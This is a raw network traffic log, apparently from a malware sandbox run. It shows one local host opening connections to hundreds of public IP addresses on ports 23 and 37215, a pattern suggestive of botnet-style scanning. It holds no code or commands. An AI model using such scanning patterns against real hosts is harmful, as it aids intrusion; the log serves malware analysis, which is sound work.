                                                          Dec 3, 2024 23:16:47.399518967 CET4048623192.168.2.23137.187.187.101
                                                          Dec 3, 2024 23:16:47.399523020 CET5472623192.168.2.2385.59.140.30
                                                          Dec 3, 2024 23:16:47.399528027 CET3381423192.168.2.23187.125.11.78
                                                          Dec 3, 2024 23:16:47.399532080 CET5227023192.168.2.23126.183.65.170
                                                          Dec 3, 2024 23:16:47.399533033 CET5690423192.168.2.2359.255.82.49
                                                          Dec 3, 2024 23:16:47.399533033 CET4234823192.168.2.23143.212.155.26
                                                          Dec 3, 2024 23:16:47.399535894 CET5124823192.168.2.2359.129.94.109
                                                          Dec 3, 2024 23:16:47.399537086 CET5913823192.168.2.23156.244.103.132
                                                          Dec 3, 2024 23:16:47.399537086 CET5835223192.168.2.23139.93.186.145
                                                          Dec 3, 2024 23:16:47.399537086 CET3286223192.168.2.23151.216.105.82
                                                          Dec 3, 2024 23:16:47.399544001 CET4532623192.168.2.2323.102.73.106
                                                          Dec 3, 2024 23:16:47.399548054 CET4393223192.168.2.23210.13.5.108
                                                          Dec 3, 2024 23:16:47.399548054 CET4451423192.168.2.2335.148.186.19
                                                          Dec 3, 2024 23:16:47.399557114 CET3746823192.168.2.23213.69.162.227
                                                          Dec 3, 2024 23:16:47.399563074 CET4920823192.168.2.2386.223.218.242
                                                          Dec 3, 2024 23:16:47.399564028 CET5583623192.168.2.23173.31.209.207
                                                          Dec 3, 2024 23:16:47.403074980 CET4059737215192.168.2.23197.184.110.72
                                                          Dec 3, 2024 23:16:47.403084040 CET4059737215192.168.2.23197.25.172.124
                                                          Dec 3, 2024 23:16:47.403084040 CET4059737215192.168.2.2341.50.74.64
                                                          Dec 3, 2024 23:16:47.403085947 CET4059737215192.168.2.23197.57.240.239
                                                          Dec 3, 2024 23:16:47.403091908 CET4059737215192.168.2.2341.53.8.39
                                                          Dec 3, 2024 23:16:47.403094053 CET4059737215192.168.2.2341.68.155.210
                                                          Dec 3, 2024 23:16:47.403103113 CET4059737215192.168.2.23197.215.117.244
                                                          Dec 3, 2024 23:16:47.403115034 CET4059737215192.168.2.23156.218.7.176
                                                          Dec 3, 2024 23:16:47.403115988 CET4059737215192.168.2.23197.139.66.129
                                                          Dec 3, 2024 23:16:47.403119087 CET4059737215192.168.2.23156.10.142.76
                                                          Dec 3, 2024 23:16:47.403126001 CET4059737215192.168.2.23156.117.177.214
                                                          Dec 3, 2024 23:16:47.403131962 CET4059737215192.168.2.2341.67.191.46
                                                          Dec 3, 2024 23:16:47.403142929 CET4059737215192.168.2.23156.90.44.202
                                                          Dec 3, 2024 23:16:47.403150082 CET4059737215192.168.2.23156.40.125.0
                                                          Dec 3, 2024 23:16:47.403151035 CET4059737215192.168.2.23156.160.59.88
                                                          Dec 3, 2024 23:16:47.403161049 CET4059737215192.168.2.23197.217.227.191
                                                          Dec 3, 2024 23:16:47.403166056 CET4059737215192.168.2.23156.168.80.171
                                                          Dec 3, 2024 23:16:47.403170109 CET4059737215192.168.2.2341.216.122.24
                                                          Dec 3, 2024 23:16:47.403172016 CET4059737215192.168.2.23197.116.173.247
                                                          Dec 3, 2024 23:16:47.403173923 CET4059737215192.168.2.2341.149.85.230
                                                          Dec 3, 2024 23:16:47.403191090 CET4059737215192.168.2.2341.10.196.132
                                                          Dec 3, 2024 23:16:47.403191090 CET4059737215192.168.2.23156.134.10.23
                                                          Dec 3, 2024 23:16:47.403191090 CET4059737215192.168.2.23197.147.35.49
                                                          Dec 3, 2024 23:16:47.403192997 CET4059737215192.168.2.23197.36.90.248
                                                          Dec 3, 2024 23:16:47.403207064 CET4059737215192.168.2.23156.201.246.141
                                                          Dec 3, 2024 23:16:47.403208017 CET4059737215192.168.2.23156.67.235.182
                                                          Dec 3, 2024 23:16:47.403218031 CET4059737215192.168.2.23197.97.52.225
                                                          Dec 3, 2024 23:16:47.403228045 CET4059737215192.168.2.23197.3.174.200
                                                          Dec 3, 2024 23:16:47.403228998 CET4059737215192.168.2.23156.253.77.182
                                                          Dec 3, 2024 23:16:47.403239965 CET4059737215192.168.2.2341.86.160.3
                                                          Dec 3, 2024 23:16:47.403240919 CET4059737215192.168.2.2341.61.151.34
                                                          Dec 3, 2024 23:16:47.403249025 CET4059737215192.168.2.23197.229.102.57
                                                          Dec 3, 2024 23:16:47.403255939 CET4059737215192.168.2.23197.129.139.142
                                                          Dec 3, 2024 23:16:47.403268099 CET4059737215192.168.2.23156.17.181.23
                                                          Dec 3, 2024 23:16:47.403270960 CET4059737215192.168.2.23156.180.111.46
                                                          Dec 3, 2024 23:16:47.403275013 CET4059737215192.168.2.2341.140.168.246
                                                          Dec 3, 2024 23:16:47.403291941 CET4059737215192.168.2.2341.17.126.226
                                                          Dec 3, 2024 23:16:47.403295040 CET4059737215192.168.2.23197.27.123.107
                                                          Dec 3, 2024 23:16:47.403295040 CET4059737215192.168.2.23156.91.119.93
                                                          Dec 3, 2024 23:16:47.403295040 CET4059737215192.168.2.2341.106.25.34
                                                          Dec 3, 2024 23:16:47.403320074 CET4059737215192.168.2.23156.28.72.8
                                                          Dec 3, 2024 23:16:47.403320074 CET4059737215192.168.2.23197.78.145.9
                                                          Dec 3, 2024 23:16:47.403321981 CET4059737215192.168.2.23197.74.186.43
                                                          Dec 3, 2024 23:16:47.403321981 CET4059737215192.168.2.23197.132.193.28
                                                          Dec 3, 2024 23:16:47.403331995 CET4059737215192.168.2.23156.213.87.168
                                                          Dec 3, 2024 23:16:47.403331995 CET4059737215192.168.2.23197.241.87.74
                                                          Dec 3, 2024 23:16:47.403331995 CET4059737215192.168.2.23197.19.75.227
                                                          Dec 3, 2024 23:16:47.403331995 CET4059737215192.168.2.23197.65.70.190
                                                          Dec 3, 2024 23:16:47.403338909 CET4059737215192.168.2.23197.119.255.0
                                                          Dec 3, 2024 23:16:47.403352022 CET4059737215192.168.2.23156.158.27.142
                                                          Dec 3, 2024 23:16:47.403359890 CET4059737215192.168.2.23197.242.75.112
                                                          Dec 3, 2024 23:16:47.403359890 CET4059737215192.168.2.2341.156.179.6
                                                          Dec 3, 2024 23:16:47.403359890 CET4059737215192.168.2.2341.161.19.116
                                                          Dec 3, 2024 23:16:47.403378010 CET4059737215192.168.2.2341.228.189.248
                                                          Dec 3, 2024 23:16:47.403383017 CET4059737215192.168.2.23156.81.50.47
                                                          Dec 3, 2024 23:16:47.403386116 CET4059737215192.168.2.23156.202.144.174
                                                          Dec 3, 2024 23:16:47.403393984 CET4059737215192.168.2.2341.122.205.241
                                                          Dec 3, 2024 23:16:47.403409958 CET4059737215192.168.2.23197.39.226.174
                                                          Dec 3, 2024 23:16:47.403418064 CET4059737215192.168.2.2341.76.42.109
                                                          Dec 3, 2024 23:16:47.403428078 CET4059737215192.168.2.23156.36.118.231
                                                          Dec 3, 2024 23:16:47.403430939 CET4059737215192.168.2.2341.69.190.172
                                                          Dec 3, 2024 23:16:47.403434992 CET4059737215192.168.2.23197.26.182.203
                                                          Dec 3, 2024 23:16:47.403434992 CET4059737215192.168.2.23197.74.116.180
                                                          Dec 3, 2024 23:16:47.403438091 CET4059737215192.168.2.2341.97.31.200
                                                          Dec 3, 2024 23:16:47.403438091 CET4059737215192.168.2.2341.153.9.207
                                                          Dec 3, 2024 23:16:47.403441906 CET4059737215192.168.2.23197.179.18.229
                                                          Dec 3, 2024 23:16:47.403444052 CET4059737215192.168.2.23197.76.37.243
                                                          Dec 3, 2024 23:16:47.403451920 CET4059737215192.168.2.23156.40.23.178
                                                          Dec 3, 2024 23:16:47.403465033 CET4059737215192.168.2.23197.22.23.7
                                                          Dec 3, 2024 23:16:47.403465986 CET4059737215192.168.2.23156.143.195.142
                                                          Dec 3, 2024 23:16:47.403469086 CET4059737215192.168.2.2341.146.175.21
                                                          Dec 3, 2024 23:16:47.403469086 CET4059737215192.168.2.23156.113.110.203
                                                          Dec 3, 2024 23:16:47.403471947 CET4059737215192.168.2.23156.146.191.51
                                                          Dec 3, 2024 23:16:47.403475046 CET4059737215192.168.2.23197.4.97.92
                                                          Dec 3, 2024 23:16:47.403503895 CET4059737215192.168.2.23197.188.93.132
                                                          Dec 3, 2024 23:16:47.403506994 CET4059737215192.168.2.23197.153.144.212
                                                          Dec 3, 2024 23:16:47.403510094 CET4059737215192.168.2.23156.84.93.28
                                                          Dec 3, 2024 23:16:47.403518915 CET4059737215192.168.2.23197.99.113.231
                                                          Dec 3, 2024 23:16:47.403528929 CET4059737215192.168.2.23156.13.25.35
                                                          Dec 3, 2024 23:16:47.403528929 CET4059737215192.168.2.23197.174.112.116
                                                          Dec 3, 2024 23:16:47.403537035 CET4059737215192.168.2.2341.110.166.81
                                                          Dec 3, 2024 23:16:47.403537035 CET4059737215192.168.2.2341.99.44.33
                                                          Dec 3, 2024 23:16:47.403538942 CET4059737215192.168.2.23156.132.84.14
                                                          Dec 3, 2024 23:16:47.403541088 CET4059737215192.168.2.2341.239.252.86
                                                          Dec 3, 2024 23:16:47.403558016 CET4059737215192.168.2.23197.241.201.88
                                                          Dec 3, 2024 23:16:47.403558016 CET4059737215192.168.2.23156.93.126.2
                                                          Dec 3, 2024 23:16:47.403558016 CET4059737215192.168.2.2341.38.167.23
                                                          Dec 3, 2024 23:16:47.403562069 CET4059737215192.168.2.2341.206.160.131
                                                          Dec 3, 2024 23:16:47.403563976 CET4059737215192.168.2.23156.60.102.66
                                                          Dec 3, 2024 23:16:47.403580904 CET4059737215192.168.2.2341.104.10.87
                                                          Dec 3, 2024 23:16:47.403584003 CET4059737215192.168.2.2341.5.197.171
                                                          Dec 3, 2024 23:16:47.403589964 CET4059737215192.168.2.23197.207.113.106
                                                          Dec 3, 2024 23:16:47.403590918 CET4059737215192.168.2.23156.159.0.61
                                                          Dec 3, 2024 23:16:47.403590918 CET4059737215192.168.2.2341.68.234.36
                                                          Dec 3, 2024 23:16:47.403593063 CET4059737215192.168.2.23156.243.246.48
                                                          Dec 3, 2024 23:16:47.403606892 CET4059737215192.168.2.23197.193.173.24
                                                          Dec 3, 2024 23:16:47.403615952 CET4059737215192.168.2.23197.173.198.92
                                                          Dec 3, 2024 23:16:47.403624058 CET4059737215192.168.2.23156.15.33.89
                                                          Dec 3, 2024 23:16:47.403631926 CET4059737215192.168.2.2341.148.65.172
                                                          Dec 3, 2024 23:16:47.403631926 CET4059737215192.168.2.2341.233.250.231
                                                          Dec 3, 2024 23:16:47.403639078 CET4059737215192.168.2.23156.19.44.94
                                                          Dec 3, 2024 23:16:47.403645992 CET4059737215192.168.2.23156.200.241.84
                                                          Dec 3, 2024 23:16:47.403661013 CET4059737215192.168.2.23156.122.122.23
                                                          Dec 3, 2024 23:16:47.403669119 CET4059737215192.168.2.23156.111.144.47
                                                          Dec 3, 2024 23:16:47.403669119 CET4059737215192.168.2.2341.246.145.220
                                                          Dec 3, 2024 23:16:47.403672934 CET4059737215192.168.2.23197.243.174.20
                                                          Dec 3, 2024 23:16:47.403672934 CET4059737215192.168.2.2341.174.175.122
                                                          Dec 3, 2024 23:16:47.403688908 CET4059737215192.168.2.2341.134.198.222
                                                          Dec 3, 2024 23:16:47.403692007 CET4059737215192.168.2.23197.169.132.20
                                                          Dec 3, 2024 23:16:47.403692961 CET4059737215192.168.2.2341.117.106.217
                                                          Dec 3, 2024 23:16:47.403702021 CET4059737215192.168.2.23197.51.115.32
                                                          Dec 3, 2024 23:16:47.403702021 CET4059737215192.168.2.23156.62.221.72
                                                          Dec 3, 2024 23:16:47.403702021 CET4059737215192.168.2.2341.189.45.86
                                                          Dec 3, 2024 23:16:47.403703928 CET4059737215192.168.2.2341.159.89.75
                                                          Dec 3, 2024 23:16:47.403717041 CET4059737215192.168.2.23156.77.134.247
                                                          Dec 3, 2024 23:16:47.403719902 CET4059737215192.168.2.2341.184.9.163
                                                          Dec 3, 2024 23:16:47.403728008 CET4059737215192.168.2.23156.146.246.138
                                                          Dec 3, 2024 23:16:47.403739929 CET4059737215192.168.2.23156.22.255.93
                                                          Dec 3, 2024 23:16:47.403745890 CET4059737215192.168.2.23156.70.153.229
                                                          Dec 3, 2024 23:16:47.403758049 CET4059737215192.168.2.23197.159.11.250
                                                          Dec 3, 2024 23:16:47.403760910 CET4059737215192.168.2.23197.3.213.29
                                                          Dec 3, 2024 23:16:47.403764963 CET4059737215192.168.2.23197.193.38.7
                                                          Dec 3, 2024 23:16:47.403775930 CET4059737215192.168.2.23197.100.7.127
                                                          Dec 3, 2024 23:16:47.403785944 CET4059737215192.168.2.2341.87.145.250
                                                          Dec 3, 2024 23:16:47.403788090 CET4059737215192.168.2.23197.224.104.9
                                                          Dec 3, 2024 23:16:47.403788090 CET4059737215192.168.2.23197.205.68.194
                                                          Dec 3, 2024 23:16:47.403788090 CET4059737215192.168.2.23156.178.175.182
                                                          Dec 3, 2024 23:16:47.403790951 CET4059737215192.168.2.23156.116.141.17
                                                          Dec 3, 2024 23:16:47.403793097 CET4059737215192.168.2.2341.224.237.159
                                                          Dec 3, 2024 23:16:47.403800011 CET4059737215192.168.2.23197.126.41.110
                                                          Dec 3, 2024 23:16:47.403801918 CET4059737215192.168.2.23156.42.117.155
                                                          Dec 3, 2024 23:16:47.403801918 CET4059737215192.168.2.23197.126.221.144
                                                          Dec 3, 2024 23:16:47.403805971 CET4059737215192.168.2.2341.106.237.92
                                                          Dec 3, 2024 23:16:47.403810024 CET4059737215192.168.2.2341.154.130.231
                                                          Dec 3, 2024 23:16:47.403827906 CET4059737215192.168.2.23156.99.192.74
                                                          Dec 3, 2024 23:16:47.403830051 CET4059737215192.168.2.2341.26.64.52
                                                          Dec 3, 2024 23:16:47.403844118 CET4059737215192.168.2.2341.247.53.201
                                                          Dec 3, 2024 23:16:47.403844118 CET4059737215192.168.2.2341.10.234.18
                                                          Dec 3, 2024 23:16:47.403855085 CET4059737215192.168.2.2341.56.102.247
                                                          Dec 3, 2024 23:16:47.403862953 CET4059737215192.168.2.2341.62.244.64
                                                          Dec 3, 2024 23:16:47.403863907 CET4059737215192.168.2.23156.190.254.236
                                                          Dec 3, 2024 23:16:47.403867006 CET4059737215192.168.2.23197.196.230.192
                                                          Dec 3, 2024 23:16:47.403867006 CET4059737215192.168.2.23197.44.51.39
                                                          Dec 3, 2024 23:16:47.403870106 CET4059737215192.168.2.23197.217.156.156
                                                          Dec 3, 2024 23:16:47.403878927 CET4059737215192.168.2.23197.137.182.69
                                                          Dec 3, 2024 23:16:47.403892994 CET4059737215192.168.2.2341.72.121.116
                                                          Dec 3, 2024 23:16:47.403892994 CET4059737215192.168.2.2341.236.158.236
                                                          Dec 3, 2024 23:16:47.403893948 CET4059737215192.168.2.2341.59.4.162
                                                          Dec 3, 2024 23:16:47.403894901 CET4059737215192.168.2.23197.145.227.47
                                                          Dec 3, 2024 23:16:47.403898954 CET4059737215192.168.2.23197.132.148.99
                                                          Dec 3, 2024 23:16:47.403902054 CET4059737215192.168.2.23156.12.85.236
                                                          Dec 3, 2024 23:16:47.403903008 CET4059737215192.168.2.23197.61.172.247
                                                          Dec 3, 2024 23:16:47.403918982 CET4059737215192.168.2.23156.218.171.79
                                                          Dec 3, 2024 23:16:47.403920889 CET8055756146.160.159.128192.168.2.23
                                                          Dec 3, 2024 23:16:47.403923988 CET4059737215192.168.2.2341.33.105.0
                                                          Dec 3, 2024 23:16:47.403928995 CET4059737215192.168.2.23197.183.158.200
                                                          Dec 3, 2024 23:16:47.403928995 CET4059737215192.168.2.2341.34.62.136
                                                          Dec 3, 2024 23:16:47.403943062 CET4059737215192.168.2.23197.67.29.164
                                                          Dec 3, 2024 23:16:47.403948069 CET4059737215192.168.2.23197.170.53.193
                                                          Dec 3, 2024 23:16:47.403960943 CET4059737215192.168.2.23197.160.25.128
                                                          Dec 3, 2024 23:16:47.403973103 CET4059737215192.168.2.2341.28.200.27
                                                          Dec 3, 2024 23:16:47.403974056 CET4059737215192.168.2.23197.249.250.15
                                                          Dec 3, 2024 23:16:47.403974056 CET4059737215192.168.2.2341.57.20.146
                                                          Dec 3, 2024 23:16:47.403984070 CET4059737215192.168.2.23197.158.90.202
                                                          Dec 3, 2024 23:16:47.403984070 CET4059737215192.168.2.23156.170.84.116
                                                          Dec 3, 2024 23:16:47.403985977 CET4059737215192.168.2.23156.99.189.45
                                                          Dec 3, 2024 23:16:47.403985977 CET4059737215192.168.2.23197.57.46.81
                                                          Dec 3, 2024 23:16:47.403991938 CET4059737215192.168.2.23197.233.13.198
                                                          Dec 3, 2024 23:16:47.403991938 CET4059737215192.168.2.23156.141.194.246
                                                          Dec 3, 2024 23:16:47.403997898 CET4059737215192.168.2.2341.173.65.94
                                                          Dec 3, 2024 23:16:47.403997898 CET4059737215192.168.2.23156.189.142.187
                                                          Dec 3, 2024 23:16:47.404006958 CET4059737215192.168.2.23156.143.164.223
                                                          Dec 3, 2024 23:16:47.404012918 CET4059737215192.168.2.23156.36.84.76
                                                          Dec 3, 2024 23:16:47.404038906 CET4059737215192.168.2.2341.221.126.244
                                                          Dec 3, 2024 23:16:47.404040098 CET4059737215192.168.2.23197.200.28.13
                                                          Dec 3, 2024 23:16:47.404041052 CET4059737215192.168.2.2341.135.204.2
                                                          Dec 3, 2024 23:16:47.404052019 CET4059737215192.168.2.23197.208.193.81
                                                          Dec 3, 2024 23:16:47.404052019 CET4059737215192.168.2.23197.158.55.179
                                                          Dec 3, 2024 23:16:47.404052019 CET4059737215192.168.2.23197.167.203.133
                                                          Dec 3, 2024 23:16:47.404052019 CET4059737215192.168.2.2341.218.101.201
                                                          Dec 3, 2024 23:16:47.404052019 CET4059737215192.168.2.2341.6.20.1
                                                          Dec 3, 2024 23:16:47.404053926 CET4059737215192.168.2.23197.14.115.64
                                                          Dec 3, 2024 23:16:47.404053926 CET4059737215192.168.2.23156.29.52.131
                                                          Dec 3, 2024 23:16:47.404057026 CET4059737215192.168.2.23197.190.79.82
                                                          Dec 3, 2024 23:16:47.404057026 CET4059737215192.168.2.2341.93.34.22
                                                          Dec 3, 2024 23:16:47.404067993 CET4059737215192.168.2.23156.58.89.82
                                                          Dec 3, 2024 23:16:47.404073000 CET4059737215192.168.2.23156.45.248.113
                                                          Dec 3, 2024 23:16:47.404073000 CET4059737215192.168.2.23156.101.44.184
                                                          Dec 3, 2024 23:16:47.404073954 CET4059737215192.168.2.2341.81.87.120
                                                          Dec 3, 2024 23:16:47.404073954 CET4059737215192.168.2.23156.97.158.2
                                                          Dec 3, 2024 23:16:47.404074907 CET4059737215192.168.2.23197.227.38.127
                                                          Dec 3, 2024 23:16:47.404074907 CET4059737215192.168.2.2341.155.146.213
                                                          Dec 3, 2024 23:16:47.404078007 CET4059737215192.168.2.23197.186.212.225
                                                          Dec 3, 2024 23:16:47.404078007 CET4059737215192.168.2.23156.3.226.119
                                                          Dec 3, 2024 23:16:47.404078007 CET4059737215192.168.2.2341.222.100.168
                                                          Dec 3, 2024 23:16:47.404078007 CET4059737215192.168.2.2341.254.54.189
                                                          Dec 3, 2024 23:16:47.404083967 CET4059737215192.168.2.23197.240.163.33
                                                          Dec 3, 2024 23:16:47.404084921 CET4059737215192.168.2.23197.44.91.167
                                                          Dec 3, 2024 23:16:47.404084921 CET4059737215192.168.2.2341.172.224.69
                                                          Dec 3, 2024 23:16:47.404089928 CET4059737215192.168.2.23197.156.245.192
                                                          Dec 3, 2024 23:16:47.404097080 CET4059737215192.168.2.23156.130.164.157
                                                          Dec 3, 2024 23:16:47.404097080 CET4059737215192.168.2.2341.15.217.207
                                                          Dec 3, 2024 23:16:47.404098988 CET4059737215192.168.2.2341.209.209.33
                                                          Dec 3, 2024 23:16:47.404099941 CET4059737215192.168.2.2341.148.239.84
                                                          Dec 3, 2024 23:16:47.404113054 CET4059737215192.168.2.2341.105.161.113
                                                          Dec 3, 2024 23:16:47.404119015 CET4059737215192.168.2.2341.3.113.74
                                                          Dec 3, 2024 23:16:47.404119968 CET4059737215192.168.2.23197.168.231.33
                                                          Dec 3, 2024 23:16:47.404119968 CET4059737215192.168.2.2341.60.40.7
                                                          Dec 3, 2024 23:16:47.404129028 CET4059737215192.168.2.23156.51.236.218
                                                          Dec 3, 2024 23:16:47.404129028 CET4059737215192.168.2.2341.53.45.107
                                                          Dec 3, 2024 23:16:47.404141903 CET4059737215192.168.2.2341.218.175.112
                                                          Dec 3, 2024 23:16:47.404145002 CET4059737215192.168.2.2341.182.26.160
                                                          Dec 3, 2024 23:16:47.404145002 CET4059737215192.168.2.23156.17.166.68
                                                          Dec 3, 2024 23:16:47.404145002 CET8055756146.160.159.128192.168.2.23
                                                          Dec 3, 2024 23:16:47.404155970 CET4059737215192.168.2.2341.9.52.128
                                                          Dec 3, 2024 23:16:47.404159069 CET4059737215192.168.2.23156.68.180.98
                                                          Dec 3, 2024 23:16:47.404167891 CET4059737215192.168.2.2341.129.160.93
                                                          Dec 3, 2024 23:16:47.404174089 CET5575680192.168.2.23146.160.159.128
                                                          Dec 3, 2024 23:16:47.404181957 CET4059737215192.168.2.2341.6.221.224
                                                          Dec 3, 2024 23:16:47.404198885 CET4059737215192.168.2.23197.222.52.105
                                                          Dec 3, 2024 23:16:47.404198885 CET4059737215192.168.2.23197.196.48.156
                                                          Dec 3, 2024 23:16:47.404198885 CET4059737215192.168.2.2341.241.202.245
                                                          Dec 3, 2024 23:16:47.404201031 CET4059737215192.168.2.23197.121.177.172
                                                          Dec 3, 2024 23:16:47.404201031 CET4059737215192.168.2.23156.203.67.210
                                                          Dec 3, 2024 23:16:47.404211044 CET4059737215192.168.2.23197.155.74.122
                                                          Dec 3, 2024 23:16:47.404228926 CET4059737215192.168.2.23197.233.29.245
                                                          Dec 3, 2024 23:16:47.404230118 CET4059737215192.168.2.2341.198.93.67
                                                          Dec 3, 2024 23:16:47.404232025 CET4059737215192.168.2.23197.240.199.37
                                                          Dec 3, 2024 23:16:47.404234886 CET4059737215192.168.2.23156.126.212.200
                                                          Dec 3, 2024 23:16:47.404237032 CET4059737215192.168.2.23197.143.36.189
                                                          Dec 3, 2024 23:16:47.404252052 CET4059737215192.168.2.2341.193.157.113
                                                          Dec 3, 2024 23:16:47.404254913 CET4059737215192.168.2.23197.238.119.16
                                                          Dec 3, 2024 23:16:47.404258013 CET4059737215192.168.2.23156.31.177.174
                                                          Dec 3, 2024 23:16:47.404263973 CET4059737215192.168.2.23197.137.118.231
                                                          Dec 3, 2024 23:16:47.404278040 CET4059737215192.168.2.23156.117.244.70
                                                          Dec 3, 2024 23:16:47.404278994 CET4059737215192.168.2.23197.110.83.22
                                                          Dec 3, 2024 23:16:47.404278994 CET4059737215192.168.2.23197.83.21.239
                                                          Dec 3, 2024 23:16:47.404282093 CET4059737215192.168.2.23197.223.233.35
                                                          Dec 3, 2024 23:16:47.404283047 CET4059737215192.168.2.23197.144.173.130
                                                          Dec 3, 2024 23:16:47.404285908 CET4059737215192.168.2.23156.168.141.205
                                                          Dec 3, 2024 23:16:47.404299021 CET4059737215192.168.2.2341.236.102.200
                                                          Dec 3, 2024 23:16:47.404299021 CET4059737215192.168.2.23156.198.129.11
                                                          Dec 3, 2024 23:16:47.404299021 CET4059737215192.168.2.23156.52.44.125
                                                          Dec 3, 2024 23:16:47.404301882 CET4059737215192.168.2.2341.221.43.248
                                                          Dec 3, 2024 23:16:47.404304028 CET4059737215192.168.2.23156.245.122.73
                                                          Dec 3, 2024 23:16:47.404320002 CET4059737215192.168.2.23197.231.30.81
                                                          Dec 3, 2024 23:16:47.404325962 CET4059737215192.168.2.2341.3.3.210
                                                          Dec 3, 2024 23:16:47.404325962 CET4059737215192.168.2.23197.237.233.67
                                                          Dec 3, 2024 23:16:47.404329062 CET4059737215192.168.2.23156.61.42.5
                                                          Dec 3, 2024 23:16:47.404342890 CET4059737215192.168.2.2341.198.73.14
                                                          Dec 3, 2024 23:16:47.404344082 CET4059737215192.168.2.2341.201.44.178
                                                          Dec 3, 2024 23:16:47.404347897 CET4059737215192.168.2.23156.72.163.204
                                                          Dec 3, 2024 23:16:47.404352903 CET4059737215192.168.2.23156.135.117.5
                                                          Dec 3, 2024 23:16:47.404352903 CET4059737215192.168.2.23156.172.34.95
                                                          Dec 3, 2024 23:16:47.404361963 CET4059737215192.168.2.23197.93.251.196
                                                          Dec 3, 2024 23:16:47.404371023 CET4059737215192.168.2.2341.29.130.134
                                                          Dec 3, 2024 23:16:47.404380083 CET4059737215192.168.2.23197.199.233.5
                                                          Dec 3, 2024 23:16:47.404382944 CET4059737215192.168.2.23156.207.232.104
                                                          Dec 3, 2024 23:16:47.404388905 CET4059737215192.168.2.23156.32.186.138
                                                          Dec 3, 2024 23:16:47.404391050 CET4059737215192.168.2.2341.14.243.50
                                                          Dec 3, 2024 23:16:47.404402971 CET4059737215192.168.2.23156.91.149.14
                                                          Dec 3, 2024 23:16:47.404406071 CET4059737215192.168.2.23156.94.1.210
                                                          Dec 3, 2024 23:16:47.404406071 CET4059737215192.168.2.23197.45.224.242
                                                          Dec 3, 2024 23:16:47.404414892 CET4059737215192.168.2.23197.141.118.119
                                                          Dec 3, 2024 23:16:47.404427052 CET4059737215192.168.2.23197.167.104.133
                                                          Dec 3, 2024 23:16:47.404427052 CET4059737215192.168.2.2341.111.76.96
                                                          Dec 3, 2024 23:16:47.404433012 CET4059737215192.168.2.23197.173.198.102
                                                          Dec 3, 2024 23:16:47.404445887 CET4059737215192.168.2.23197.61.199.4
                                                          Dec 3, 2024 23:16:47.404447079 CET4059737215192.168.2.2341.235.89.139
                                                          Dec 3, 2024 23:16:47.404447079 CET4059737215192.168.2.23156.52.75.72
                                                          Dec 3, 2024 23:16:47.404460907 CET4059737215192.168.2.23197.70.139.225
                                                          Dec 3, 2024 23:16:47.404462099 CET4059737215192.168.2.23156.224.172.93
                                                          Dec 3, 2024 23:16:47.404464006 CET4059737215192.168.2.23156.17.213.52
                                                          Dec 3, 2024 23:16:47.404468060 CET4059737215192.168.2.23156.54.240.35
                                                          Dec 3, 2024 23:16:47.404489994 CET4059737215192.168.2.23197.242.6.176
                                                          Dec 3, 2024 23:16:47.404490948 CET4059737215192.168.2.2341.11.59.149
                                                          Dec 3, 2024 23:16:47.404491901 CET4059737215192.168.2.23197.137.136.40
                                                          Dec 3, 2024 23:16:47.404491901 CET4059737215192.168.2.2341.128.123.44
                                                          Dec 3, 2024 23:16:47.404491901 CET4059737215192.168.2.23156.57.229.24
                                                          Dec 3, 2024 23:16:47.404495001 CET4059737215192.168.2.23156.127.211.45
                                                          Dec 3, 2024 23:16:47.404495001 CET4059737215192.168.2.23156.142.138.229
                                                          Dec 3, 2024 23:16:47.404500961 CET4059737215192.168.2.2341.202.111.225
                                                          Dec 3, 2024 23:16:47.404515028 CET4059737215192.168.2.23197.75.222.8
                                                          Dec 3, 2024 23:16:47.404517889 CET4059737215192.168.2.23156.255.0.3
                                                          Dec 3, 2024 23:16:47.404522896 CET4059737215192.168.2.2341.238.62.152
                                                          Dec 3, 2024 23:16:47.404522896 CET4059737215192.168.2.2341.12.91.209
                                                          Dec 3, 2024 23:16:47.404540062 CET4059737215192.168.2.23197.166.1.190
                                                          Dec 3, 2024 23:16:47.404544115 CET4059737215192.168.2.23197.56.232.62
                                                          Dec 3, 2024 23:16:47.404550076 CET4059737215192.168.2.23197.23.125.116
                                                          Dec 3, 2024 23:16:47.404551029 CET4059737215192.168.2.23197.59.216.232
                                                          Dec 3, 2024 23:16:47.404556990 CET4059737215192.168.2.23156.212.173.148
                                                          Dec 3, 2024 23:16:47.404566050 CET4059737215192.168.2.23197.216.212.129
                                                          Dec 3, 2024 23:16:47.404582977 CET4059737215192.168.2.2341.195.73.168
                                                          Dec 3, 2024 23:16:47.404583931 CET4059737215192.168.2.2341.6.94.13
                                                          Dec 3, 2024 23:16:47.404582977 CET4059737215192.168.2.2341.152.102.152
                                                          Dec 3, 2024 23:16:47.404584885 CET4059737215192.168.2.2341.191.76.63
                                                          Dec 3, 2024 23:16:47.404591084 CET4059737215192.168.2.2341.251.80.224
                                                          Dec 3, 2024 23:16:47.404592037 CET4059737215192.168.2.23156.46.162.42
                                                          Dec 3, 2024 23:16:47.404592037 CET4059737215192.168.2.2341.7.45.240
                                                          Dec 3, 2024 23:16:47.404611111 CET4059737215192.168.2.23197.13.17.68
                                                          Dec 3, 2024 23:16:47.404611111 CET4059737215192.168.2.23156.224.34.215
                                                          Dec 3, 2024 23:16:47.404613018 CET4059737215192.168.2.23197.58.90.187
                                                          Dec 3, 2024 23:16:47.404618025 CET4059737215192.168.2.23156.252.38.39
                                                          Dec 3, 2024 23:16:47.404634953 CET4059737215192.168.2.2341.84.169.232
                                                          Dec 3, 2024 23:16:47.404634953 CET4059737215192.168.2.23197.207.73.210
                                                          Dec 3, 2024 23:16:47.404639006 CET4059737215192.168.2.2341.210.2.26
                                                          Dec 3, 2024 23:16:47.404648066 CET4059737215192.168.2.23156.37.86.0
                                                          Dec 3, 2024 23:16:47.404654980 CET4059737215192.168.2.23197.23.58.5
                                                          Dec 3, 2024 23:16:47.404661894 CET4059737215192.168.2.2341.151.247.227
                                                          Dec 3, 2024 23:16:47.404663086 CET4059737215192.168.2.23197.136.201.105
                                                          Dec 3, 2024 23:16:47.404669046 CET4059737215192.168.2.23197.2.178.6
                                                          Dec 3, 2024 23:16:47.404673100 CET4059737215192.168.2.23197.115.32.186
                                                          Dec 3, 2024 23:16:47.404680014 CET4059737215192.168.2.2341.189.112.58
                                                          Dec 3, 2024 23:16:47.404685020 CET4059737215192.168.2.23197.237.188.223
                                                          Dec 3, 2024 23:16:47.404696941 CET4059737215192.168.2.23156.37.241.129
                                                          Dec 3, 2024 23:16:47.404702902 CET4059737215192.168.2.2341.251.179.205
                                                          Dec 3, 2024 23:16:47.404715061 CET4059737215192.168.2.23156.95.94.117
